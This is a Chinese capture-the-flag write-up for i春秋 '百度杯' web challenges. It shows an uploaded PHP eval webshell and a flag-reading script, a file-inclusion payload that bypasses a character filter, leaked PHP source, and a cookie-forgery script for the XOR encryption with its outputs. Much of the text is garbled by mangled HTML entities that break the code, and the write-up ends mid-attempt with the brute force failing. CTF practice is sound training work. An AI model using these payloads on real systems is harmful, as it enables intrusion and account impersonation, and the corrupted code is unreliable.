i春秋web“百度杯”CTF比赛九月场Uploadcode

可以上传文件&＃xff0c;并且上传之后可以点击源码链接打开文件&＃xff0c;上传了这几句话&＃xff1a;


&＃64;eval($POST["code"]);
?>


结果发现

<script language&＃61;"PHP">
$f&＃61;fopen("../flag.".strtolower("PHP"),&＃39;r&＃39;);
echo fread($f,filesize("../flag.".strtolower("PHP")));
fclose($f);
</script>


查看源码&＃xff0c;点击/u/x.php即可得到flag。
这里附上PHP四种标记风格链接https://blog.csdn.net/qq_35085863/article/details/76714367

题目打开是一张图片&＃xff0c;http://154dd661c59a463aacb5d7f969774e19a5144eb67aee4c93.changame.ichunqiu.com/index.php?jpg&＃61;hei.jpg

看url发现可能是文件包含&＃xff0c;查看index.php:

http://154dd661c59a463aacb5d7f969774e19a5144eb67aee4c93.changame.ichunqiu.com/index.php?jpg&＃61;index.php


查看源码&＃xff0c;得到一串base64编码

<title>file:index.php</title><img src&＃61;&＃39;data:image/gif;base64,PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KaGVhZGVyKCdjb250ZW50LXR5cGU6dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgnKTsNCmlmKCEgaXNzZXQoJF9HRVRbJ2pwZyddKSkNCiAgICBoZWFkZXIoJ1JlZnJlc2g6MDt1cmw9Li9pbmRleC5waHA/anBnPWhlaS5qcGcnKTsNCiRmaWxlID0gJF9HRVRbJ2pwZyddOw0KZWNobyAnPHRpdGxlPmZpbGU6Jy4kZmlsZS4nPC90aXRsZT4nOw0KJGZpbGUgPSBwcmVnX3JlcGxhY2UoIi9bXmEtekEtWjAtOS5dKy8iLCIiLCAkZmlsZSk7DQokZmlsZSA9IHN0cl9yZXBsYWNlKCJjb25maWciLCJfIiwgJGZpbGUpOw0KJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsNCg0KZWNobyAiPGltZyBzcmM9J2RhdGE6aW1hZ2UvZ2lmO2Jhc2U2NCwiLiR0eHQuIic&＃43;PC9pbWc&＃43;IjsNCg0KLyoNCiAqIENhbiB5b3UgZmluZCB0aGUgZmxhZyBmaWxlPw0KICoNCiAqLw0KDQo/Pg&＃61;&＃61;&＃39;></img>


解码之后&＃xff0c;得到


/*** Created by PhpStorm.* Date: 2015/11/16* Time: 1:31*/
header(&＃39;content-type:text/html;charset&＃61;utf-8&＃39;);
if(! isset($_GET[&＃39;jpg&＃39;]))header(&＃39;Refresh:0;url&＃61;./index.php?jpg&＃61;hei.jpg&＃39;);
$file &＃61; $_GET[&＃39;jpg&＃39;];
echo &＃39;&＃39;;
$file &＃61; preg_replace("/[^a-zA-Z0-9.]&＃43;/","", $file);
$file &＃61; str_replace("config","_", $file);
$txt &＃61; base64_encode(file_get_contents($file));echo ".$txt."&＃39;>";/** Can you find the flag file?**/?>


看了wp之后&＃xff0c;phpstorm新建项目会生成.idea文件夹&＃xff0c;打开里面有workspace.xml&＃xff0c;访问一下http://154dd661c59a463aacb5d7f969774e19a5144eb67aee4c93.changame.ichunqiu.com/.idea/workspace.xml&＃xff0c;查看源码&＃xff0c;发现有点东西&＃xff0c;

<option value&＃61;"$PROJECT_DIR$/x.php" />
<option value&＃61;"$PROJECT_DIR$/config.php" />
<option value&＃61;"$PROJECT_DIR$/fl3g_ichuqiu.php" />


于是直接访问fl3g_ichuqiu.php&＃xff0c;发现不行╮(╯▽╰)╭那么还可以通过index.php来读文件&＃xff08;访问index.php?jpg&＃61;fl3g_ichuqiu.php&＃xff09;&＃xff0c;但是不难发现过滤了大小写数字字符以外的其他字符&＃xff0c;也就是说_被过滤了&＃xff0c;但是又发现config会被替代成_也就可以绕过过滤了。所以payload&＃xff1a;

/index.php?jpg&＃61;fl3gconfigichuqiu.php


又是一串base64&＃xff0c;转一下&＃xff0c;得到源码&＃xff1a;


/*** Created by PhpStorm.* Date: 2015/11/16* Time: 1:31*/
error_reporting(E_ALL || ~E_NOTICE);
include(&＃39;config.php&＃39;);
//获取length位数的随机字符串
function random($length, $chars &＃61; &＃39;ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz&＃39;) {$hash &＃61; &＃39;&＃39;;$max &＃61; strlen($chars) - 1;for($i &＃61; 0; $i < $length; $i&＃43;&＃43;) {$hash .&＃61; $chars[mt_rand(0, $max)];}return $hash;
}
//加密过程&＃xff0c;txt是明文&＃xff0c;key是密文
function encrypt($txt,$key){for($i&＃61;0;$i<strlen($txt);$i&＃43;&＃43;){$tmp .&＃61; chr(ord($txt[$i])&＃43;10); //txt内容ASCII码值加10}$txt &＃61; $tmp;$rnd&＃61;random(4); $key&＃61;md5($rnd.$key); //随机字符与密钥key拼接得到新的密钥$s&＃61;0;for($i&＃61;0;$i<strlen($txt);$i&＃43;&＃43;){if($s &＃61;&＃61; 32) $s &＃61; 0;$ttmp .&＃61; $txt[$i] ^ $key[&＃43;&＃43;$s]; //将明文与密钥key按位进行异或}return base64_encode($rnd.$ttmp); //base64加密
}
//解密过程&＃xff0c;txt是密文&＃xff0c;key是密钥
function decrypt($txt,$key){$txt&＃61;base64_decode($txt);$rnd &＃61; substr($txt,0,4); //减掉4位随机数$txt &＃61; substr($txt,4); //真正的密文$key&＃61;md5($rnd.$key);$s&＃61;0;for($i&＃61;0;$i<strlen($txt);$i&＃43;&＃43;){if($s &＃61;&＃61; 32) $s &＃61; 0;$tmp .&＃61; $txt[$i]^$key[&＃43;&＃43;$s]; //将密文与秘钥进行异或得到tmp}for($i&＃61;0;$i<strlen($tmp);$i&＃43;&＃43;){$tmp1 .&＃61; chr(ord($tmp[$i])-10);}return $tmp1; //明文
}
$username &＃61; decrypt($_COOKIE[&＃39;user&＃39;],$key); //获取COOKIE的内容
if ($username &＃61;&＃61; &＃39;system&＃39;){echo $flag;
}else{setCOOKIE(&＃39;user&＃39;,encrypt(&＃39;guest&＃39;,$key));echo "╮(╯▽╰)╭";
}
?>


看了PureT大佬的wp https://www.jianshu.com/p/3d7fb34c28a6
分析之后&＃xff0c;flag应该是在config里。fl3g_ichuqiu.php文件接收COOKIE值解密之后如果等于system就输出flag&＃xff0c;我们要做的就是研究加密算法怎么让fl3g_ichuqiu.php解密COOKIE中的username等于system。
破解这个加密算法的着手点就是我们已知guest加密后的结果。
先用burpsuite拦截数据包读取COOKIE然后运行脚本。
大佬大佬&＃xff0c;PHP写了个脚本&＃xff0c;佩服~~

error_reporting(E_ALL || ~E_NOTICE);$text &＃61; &＃39;guest&＃39;;$COOKIE_guest &＃61; &＃39;dk9FS0hOXUhH&＃39;; $COOKIE_guest &＃61; base64_decode($COOKIE_guest);$rnd &＃61; substr($COOKIE_guest,0,4); $COOKIE_guest &＃61; substr($COOKIE_guest,4);for ($i &＃61; 0; $i < strlen($text); $i&＃43;&＃43;) {$text[$i] &＃61; chr(ord($text[$i])&＃43;10);}for ($i &＃61; 0; $i < strlen($text); $i&＃43;&＃43;) {$key .&＃61; ($text[$i] ^ $COOKIE_guest[$i]);}$text2 &＃61; &＃39;system&＃39;;for ($i &＃61; 0; $i < strlen($text2); $i&＃43;&＃43;) {$text2[$i] &＃61; chr(ord($text2[$i])&＃43;10);}$t &＃61; &＃39;0123456789abcdef&＃39;;for ($j &＃61; 0; $j < strlen($t); $j&＃43;&＃43;) {$key_temp &＃61; $key.$t[$j];$result &＃61; &＃39;&＃39;;for ($i &＃61; 0; $i < strlen($text2); $i&＃43;&＃43;) {$result .&＃61; ($key_temp[$i] ^ $text2[$i]);}$result &＃61; base64_encode($rnd.$result);echo $result."\n";}?>


在脚本中已经写好了所有六位的情况&＃xff0c;运行脚本输出&＃xff1a;

dk9FS0SyT0tWRw&＃61;&＃61;
dk9FS0SyT0tWRg&＃61;&＃61;
dk9FS0SyT0tWRQ&＃61;&＃61;
dk9FS0SyT0tWRA&＃61;&＃61;
dk9FS0SyT0tWQw&＃61;&＃61;
dk9FS0SyT0tWQg&＃61;&＃61;
dk9FS0SyT0tWQQ&＃61;&＃61;
dk9FS0SyT0tWQA&＃61;&＃61;
dk9FS0SyT0tWTw&＃61;&＃61;
dk9FS0SyT0tWTg&＃61;&＃61;
dk9FS0SyT0tWFg&＃61;&＃61;
dk9FS0SyT0tWFQ&＃61;&＃61;
dk9FS0SyT0tWFA&＃61;&＃61;
dk9FS0SyT0tWEw&＃61;&＃61;
dk9FS0SyT0tWEg&＃61;&＃61;
dk9FS0SyT0tWEQ&＃61;&＃61;


guest5位而system6位&＃xff0c;还有最后1位需要我们爆破&＃xff0c;把上面的载入到bp爆破&＃xff0c;理论上是这样&＃xff0c;但是就是爆不出来&＃xff0c;┭┮﹏┭┮